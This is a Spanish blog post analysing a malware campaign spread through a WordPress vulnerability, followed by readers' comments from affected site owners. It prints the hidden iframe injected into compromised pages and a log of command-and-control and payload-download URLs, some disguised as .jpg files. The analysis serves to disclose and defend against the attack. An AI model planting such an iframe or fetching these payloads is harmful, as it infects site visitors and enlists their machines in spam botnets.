Hace poco me llegó un aviso de que WordPress podría tener un fallo de seguridad. Más o menos 8 o 10 horas después, me encuentro con que más de 30.000 sitios estaban afectados por esta vulnerabilidad, realizando una simple búsqueda en Google.
Hace unos 3 días, leyendo mi RSS me encontré una entrada de Ignacio Escolar, en la que comentaba que había sido víctima de este ataque, así que me puse en contacto con él y me ofrecí a echarle un cable, ya que a mí me interesan mucho estos temas, y creo que puede ser de interés para los que leéis este blog.
Pego en este post todo lo que me he encontrado hasta ahora, por si hay algún afectado y le interesa el tema, ya que el Malware sigue activo en estos momentos.
Disclaimer: No abras el contenido de las Web que aparecen si tienes activado JavaScript
Si se aprovecha la vulnerabilidad, el exploit añade en el código fuente un Iframe que apunta a otro sitio Web, desde el que se lanzaba todo el ataque.
<!– Traffic Statistics –> <iframe src=http://61.155.8.157/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe> <!– End Traffic Statistics –>
Este Iframe, te redirige a una Web, en la que en el código fuente hay un Javascript con el código ofuscado, el cual tenéis aquí (Guardar destino como…).
Al intentar decodificar el Javascript me aparece otro sitio Web, en este caso el siguiente:
Mirando por encima el contenido que suelta ese good.php, te das cuenta enseguida que se trata de un ejecutable, tal y como podéis comprobar en la siguiente imagen:
El archivo en cuestión, está empacado con UPX, famoso compresor y descompresor de ejecutables, y ampliamente utilizado por Malware.
Una vez que infecta la máquina, éste intenta descargarse varias muestras de Malware, también comprimidas con UPX. El informe completo lo tenéis en virustotal.
He realizado un análisis forense OnLine del malware en sí. Pongo aquí lo más característico.
Al ejecutar el malware en la máquina, éste intenta descargarse de Internet varias muestras. Las copias de estas muestras las aloja en streams del ejecutable Explorer.exe, el cual es legítimo de Spectra.
Analizando el ejecutable con Process Explorer, se puede realizar una valoración de las peticiones que realiza el malware.
Se puede deducir en este caso, que el malware utiliza el equipo como un Zombie, el cual utiliza para establecer conexiones con otros blogs y direcciones de Internet, esperando ser atacadas.
El malware se descarga otro ejecutable de Internet. En este caso se descarga una aplicación de envío masivo de mails, el cual me queda por analizar, ya que utiliza SSL para el envío de éstos, y en la captura de red que he recogido todavía no me ha dado tiempo de analizar.
Para analizar el posible tráfico SSL que esté utilizando el malware a través de la inyección del Explorer.exe, utilicé las herramientas STRACE y HTTPREPLAY para analizar ese tráfico cifrado. Tenéis un excelente post de David Cervigón explicando estas herramientas. El log completo lo tenéis aquí (Guardar destino como…).
En unos 45 minutos, el Malware me ha dejado un Log de conexiones de unos 13 MB, de los que se recoge, entre otra información, direcciones de los atacantes, las cuales son las siguientes:
BS-AR:https://www.yaho0-groups.info/base/a.php
uri: https://www.yaho0-groups.info/base/a.php
received from the base: https://61.155.8.157/test/5.php
retreive nu UID from https://61.155.8.157/test/5.php
uri: https://61.155.8.157/test/5.php
uri: https://61.155.8.157/test/5.php
*http://nil213.narod.ru/pom/pompay.jpg*
uri: http://nil213.narod.ru/pom/pompay.jpg
*http://alor686.narod.ru/fg/seh3.jpg*
uri: http://alor686.narod.ru/fg/seh3.jpg
*http://ronna58.narod.ru/anl/analyzer.jpg*
uri: http://ronna58.narod.ru/anl/analyzer.jpg
*http://folp0.narod.ru/yb/yb2.jpg*
uri: http://folp0.narod.ru/yb/yb2.jpg
*http://tri57.ingyenweb.hu/bl/bl2_5.jpg*
uri: http://tri57.ingyenweb.hu/bl/bl2_5.jpg
parB: *http://bonv3.narod.ru/cr/crawler.jpg*
uri: http://bonv3.narod.ru/cr/crawler.jpg
*http://tachell14.tripod.com/14/ggr4.jpg*
uri: http://tachell14.tripod.com/14/ggr4.jpg
*http://tenta9.narod.ru/gml/gmail3.jpg*
*http://utenti.lycos.it/nil21/is/whois2.jpg*
uri: http://utenti.lycos.it/nil21/is/whois2.jpg
*http://minako49.tripod.com/rf/RF_DIP_1.jpg*
uri: http://minako49.tripod.com/rf/RF_DIP_1.jpg
*http://nil213.narod.ru/ext/extract5.jpg*
uri: http://nil213.narod.ru/ext/extract5.jpg
*http://donp4.narod.ru/fg/fg5.jpg*
uri: http://donp4.narod.ru/fg/fg5.jpg
https://61.155.8.157/test/5.php
master URI is http://61.155.8.157/gmail/gmail_task_1302.php
uri: https://61.155.8.157/test/5.php
master URI is http://69.93.173.58/analyzer/analyzer.php
uri: https://61.155.8.157/test/5.php
master URI is http://61.155.8.157/gmail/blogger_server_5.php
uri: https://61.155.8.157/test/5.php
master URI is http://61.155.8.157/test/5.php
uri: https://61.155.8.157/test/5.php
master URI is http://69.93.173.58/crawler/crawler.php
uri: https://61.155.8.157/test/5.php
master URI is http://69.93.173.58/whois/whois.php
uri: https://61.155.8.157/test/5.php
master URI is http://61.155.8.157/test/stask.php
Como información adicional, también se recoge información sobre los Blogs a los que ataca:
En el Log también se recoge información sobre el método de inyección en el ejecutable Explorer.exe:
Por otro lado están las capturas de red que he realizado mientras el Malware estaba activo en la máquina, dando también bastante información sobre el Malware en sí, ya que utiliza nombres de usuario y password en claro para autenticarse en varios sitios Web, y con los que realiza comentarios (SPAM) en los que se sugiere que se descarguen cierta basura de Internet, como Ringtones, aplicaciones para jugar al Casino, etc…
El servidor, al parecer está alojado en China, según localización de dominio e IP. Podéis realizar otra comprobación en esta Web.
Con esta información, lo primero que debéis hacer es banear toda dirección IP que pueda enlazar a uno de estos ejecutables, y revisar comentarios en nuestros Blogs, ya que podemos, sin quererlo, estar propagando de alguna forma este ataque masivo.
Como nota final, comentar que si algún equipo sigue el principio del mínimo privilegio, esta infección no se provocaría en el sistema, al carecer de privilegios como inyección y alojamiento de Malware en el directorio %systemroot%.
Si alguno está afectado y necesita información, que me mande un mail y le pasaré toda la información al respecto.
1Saludo a tod@s!
El diario de Juanito 
Coño, por fin un buen artículo sobre este bug y no otro copy&paste de los diarios del SANS, que los hay a patadas.
Coder qué pasha tío?
Muchas gracias titi!
Lo examiné porque tampoco entendí nada de los otros diarios. Si necesitas la info, ya sabes, mailme y te la adjunto.
Saludetes!
Buen articulo tío!!
Si es que no me extraña que de wordpress saquen fallas cada dos 2 por 3, solo hace falta mirarlo un poco para ver que su estructura de código es una mierda! va en camino de php-nuke o el mismo Joomla.
1saludo!
Eres un máquina Juanillo
Veo que por lo menos hay alguien al que le vale lo que cuento. En breve me meteré un poquito con el Windbg
saludos
Eres un máquina! Tiene mis respetos!
Ha molado el analisis 🙂
Yo estoy desesperado, en mi blog http://www.elcolador.com con WP me meten un iframe similar a esto y no se como lo hacen… He actualizado a la ultima version, he cambiado todos los pass y el dia 1 de Julio volvieron a hacerlo :(.
Juanito Muy buena información, yo tenía el mismo problema en un portal de joomla, pero ya lo pude quitar, aunque por el momento, a decir verdad y gracias a mis proveedores de internet aun no tengo idea de cual de las medidas que tome fue la que lo hizo desaparecer. (Ya ves que tienen a bien guardar las páginas en cache)
He revisado los post del Foro todavía no he encontrado ningún código en los mensajes, Tenía un módulo (que por supuesto ya desinstale) que se trababa y casualmente al darle click es cuando saltaba el antivirus.
Modifique también el .htacces, cambie claves. etc.
Todavia hoy por la mañana aparecia el codigo, y después de un rato.. al volver a revisar ya no aparecía.
Quiero suponer que todavia estaba funcionando la cache del proveedor de internet.
Por el momento todavia sigo buscando si hay algun código inyectado, igual me gustaría saber si ya tienes alguna información de la forma de inyectarlo, hasta ahorita se que puede ser por un post, en joomla por algunos templates componentes o módulos que llaman al código malicioso.
Igual me gustaría poder ayudar en lo que se pueda y estar en contacto por si tienes más información al respecto.
Gracias.
Hola juanito, tengo un portal de danza, creado con joomla, y desde hece una semana me está afectando un troyano que redirecciona a «61.155.8.157/iframe/wp-stats.php». He intentado buscar una solución pero hasta ahora ni una pizca de solución, tenpoco desde mi proveedor de hosting, buscando por la web he incontrado tu diario y, bueno, te agradecería mucho si me pudieras dirme como puedo solucionar el problema visto que hay muchos utentes de la web che se están preocupando. La web en cuestíon es http://www.dancepeople.es y la email es info@dancepeople.es
Muchas gracias de antemano
Hola Juanito, mi nombre es David, soy Informático en una empresa de distribución de conservas, y hace poco al intentar entrar en nuestra web mediante el Google utilizando IE y Mozilla, me apareció el aviso de que esta utilizando código malicioso. Entré en la página y observé el código fuente, y ví lo de los scripts codificados, así como los enlaces a páginas web extrañas con extensiones .ru la mayoría.
Bueno, al final me entró un virus que afectó a 3 de los 5 ordenadores de la red, y 2 de ellos tuve que formatearlos mientras que el 3º pude arreglarlo con el Spybot. El tema es que borré el contenido de la cuenta FTP y volví a introducir la copia de seguridad que tenía, pero volvió a aparecer el código malicioso :S
A ver que me puedes decir, tú o cualquiera que haya podido solucionar este problema.
Muchas gracias, mi correo es davidmedina@hotmail.com
Página web (¿maliciosa?): http://www.curbera.com
Hola, llegue aquí por que lamentablemente mi blog ha sido infectado y quisiera saber si es posible que me ayudes, ya que no se nada sobre esto.
saludoss!!